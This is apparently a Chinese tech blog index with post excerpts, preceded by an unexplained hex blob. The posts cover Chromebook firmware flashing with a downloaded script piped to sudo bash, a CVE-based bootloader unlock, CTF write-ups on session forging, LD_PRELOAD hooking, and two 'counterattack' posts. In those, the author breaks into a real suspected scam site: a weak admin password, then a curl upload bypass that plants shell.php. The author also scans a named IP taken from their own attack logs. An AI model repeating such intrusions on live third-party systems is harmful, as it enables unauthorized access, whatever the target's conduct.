d11f07192009117fef5a0b01d63fc782c9bbf12e06148f06665e767957de0ab20f956dc4425b14826a1b6269dae19eb647ec65940e4be2671174c87c18633c3e6eae8fb0f3dace27c97330026ca86955dab703aabfd3704ab9ea6e44300bb926de04ac93d0ad45edcdc65e98790a643263f0e01a618532e7297d57504d45027b00285205bb909ccfc4d1f5d6263526781b6b52919e292ef7841d8365cac281888fe2de1a356cbd989e632d400f4a5dafc587f61e4e399f93b5b25e76f2eb7b1f044fe305c55873425dfeec012cdc7085a494d23f081fb7f7a491626505864bb9d9fb16443af9a8e54ef4053c3e5878012b31ba89e0201cbb5 ...
HP Elite Dragonfly(i7-1265U + 32GB + 512 GB)。
重置了3、4次,得出了最优雅的双系统解决方案。不需要解除固件写保护,也就不存在砖的可能。
1. 先启用开发者模式自行查找教程
2. 刷写RW_LEGACYChromebook的固件分为两部分,一部分写保护,一部分可写。前者用于ChromeOS的安全启动,后者(RW_LEGACY)用于传统启动,默认这个区域是空的(或者是用不了的U-Boot)。如果在这个区域写入自定义固件(edk2),并且在开机时按下ctrl+l,就可以启动uefi兼容固件edk2用于引导标准的linux系统。这一部分可以参考Mr. Chromebox。这里快速带过,不会提及细节。
按Ctrl+ALT+F2(刷新键),打开VT2,使用chronos登录(默认无密码),执行(手敲一下吧):
1cd; curl -LOf https://mrchromebox.tech/firmware-util.sh && sudo bash firmware-util.sh
建议先选5备份固件,然后选1刷写RW_LEGACY。如果 ...
想学嵌入式开发,这个笔记用来记录我遇到的坑,未来总还会再次遇到的。
合宙的ESP32C3/S3分新版旧版,我的都是旧版,板载的Type-C是连接到CH343上,所以不装驱动程序是刷不进去的,但是串口监视器可以读。
macOS 11以后,安装CH34X驱动非常简单,把.app拖到/Applications,打开,点击安装就可以。卸载只需要把app拖到垃圾箱就行。下载链接在这里。
几个月前二手淘了一个二手外版酷比魔方iPlay 50。Unisoc T618,4GB RAM,自带系统太卡了,打算解个BL先。
教程
我没有Windows环境,使用Ubuntu:
12345678sudo apt-get install build-essential libusb-1.0-0-dev gitgit clone --recursive https://github.com/TomKing062/CVE-2022-38694_unlock_bootloader.gitcd CVE-2022-38694_unlock_bootloadergcc chsize.c -o chsizegcc gen_spl-unlock.c -o gen_spl-unlockgcc gen_spl-unlock-legacy.c -o gen_spl-unlock-legacycd spreadtrum_flashmake
会得到chsize、gen_spl-unlock、spd_dump。
在Release下载对应的设备的固件,我使用这个,下载,解压
将前面编译获得的chsize、gen_ ...
上周给我的VPS装了fail2ban,今天一看黑名单,收获满满啊🤣。随便挑了一个了来练练手,就这个了,160.***.***.236。
dddd先扫一下,先是发现了http://160.***.***.236:806/开放了目录,有游戏充值等等配置文件,感觉是个诈骗网站。
接着发现关联域名https://bm.******.online/,是个ai写的php后台。admin/admin123弱密码。
观察js,发现/includes/upload_image.php接口。只允许上传jpg/png/gif。直接写是没用的,没什么思路,翻了翻上传题的笔记,发现了双扩展名绕过。
1234curl -s -k -X POST "https://bm.******.online/includes/upload_image.php" \ -b /tmp/admin_cookies.txt \ -F "file=@/tmp/assert.gif;filename=shell.php"{"url&q ...
What time is it?题目使用f"{username}.{created_at * 2026}"来作为session,但是在/welcome里,任何用户都可以得知admin的created_at的UTC时间,转为timestamp就可以获得admin的session。
123456from datetime import datetime, timezonetime_str = "26/01/2026, 08:18:02 UTC"dt = datetime.strptime(time_str, "%d/%m/%Y, %H:%M:%S UTC")dt = dt.replace(tzinfo=timezone.utc)timestamp = int(dt.timestamp())print("admin." + str(timestamp*2026))
1DH{It_is_time_t0_s1eep~_~}
22 - SQL Injec ...
After ImageSession Poison开始做这题时,团队成员已经完成了第一部分的Session投毒,这里快速过一下。
profile.php 支持上传配置文件,并把文件直接移动到 /tmp/。
PHP 默认会话文件同样位于临时目录,命名为 /tmp/sess_。
web/php.ini 中启用了 session.use_only_cookies = 0 和 session.use_trans_sid = 1,因此可以通过 URL 参数 ?PHPSESSID= 指定会话。
组合后可通过上传文件直接伪造任意会话文件,形成任意 $_SESSION 注入。
举个例子,上传文件名使用sess_victim123,内容使用 PHP 会话格式,例如 nickname|s:5:"hello";,访问 index.php?PHPSESSID=victim123 后页面会显示伪造值。
因为伪造的是原始 PHP 会话文件,不会经过 **htmlspecialchars()**,登陆后的Welc ...
0x00: 打我干嘛qwq我的VPS被打了,一看sshd日志,全是登录尝试。不过有几个IP吸引了我的注意,它们使用了chaomixian作为用户名尝试登录,而且这样的记录有6049条!
那就拉一条最新的(2026-02-28 21:03)幸运儿61.169.28.178来分析一下。
0x01: 信息收集fscan先上手做初步的信息收集,可以看到,资产还是不少的:
顺藤摸瓜先来到http://61.169.28.178:8000,网页Title是Deeplumen,我马上想到了《人生切割术》😂。
上网搜索一下,发现一篇水文。但无论怎么看,这个都像是山寨的。我更愿意相信deeplumen.io是真的,这个是假的。
对着8000端口扫一下dirsearch,结果还算丰富。快速做一下fuzz,发现访问/assets/路由,会进入一个加载不太正常的网页:按钮乱点一通,发现ai真的有响应。这说明有戏啊。把混淆过的js扔给Gemini分析,获得以下api。
0x02: 你好,外卖🥡
请求方式
接口路径
功能描述
请求参数 / Body
POST
/public/ecomme ...
Timmy给我发了他的博客编译器幕后,woc好帅,我也要写,写vFlow的。
vFlow 是一款为 Android 平台设计的、强大且高度可扩展的自动化工具。它允许你通过图形化界面,将一系列“动作模块”自由组合成强大的“工作流”,从而自动完成各种日常的、重复性的屏幕操作任务。
首页
工作流编辑
模块管理器
0x00. 起因
2025年4月,在Apple Watch S5上的浏览器上看见一加13T,顿时被它的美貌所吸引:哇!完美的Pixel!完美的粉色!完美的Deco设计!
2025年6月份购入一部一加13T,折腾完root,又感觉索然无味…
2025年7月,机缘巧合下接了一个外包,要求开发一款安卓端自动化宏工具,这就是vFlow的前身,vClick。在开发vClick的过程中,产生了一些vFlow的最初构思,但由于与vClick需求不符,手头的开发开始偏离我的设想。
2025年8月30日,vClick补齐OCR相关功能,vFlow项目新建文件夹。考虑的vClick本身的包袱和局限,没有选择分支 ...
打CTF的时候粗略学过LD_PRELOAD的用法,可以用来绕过php的disable_functions,也可以用于一些特殊场景,改变原有逻辑的预期返回。现在来具体写一篇文章来梳理一下知识点,因为下一个要做的安卓方面的项目需要这个技能点。
简单使用很好理解,就是一个环境变量,提前载入动态链接库,先到先得。举个例子:
劫持函数调用123456789101112131415#define _GNU_SOURCE#include <stdio.h>#include <dlfcn.h>// 要劫持的函数,这里的前面要与原来保持一致int open(const char *pathname, int flags) { // 获取真正的 open 函数地址 int (*original_open)(const char *, int); original_open = dlsym(RTLD_NEXT, "open"); printf("调用了open函数: %s\n", pathname); / ...



















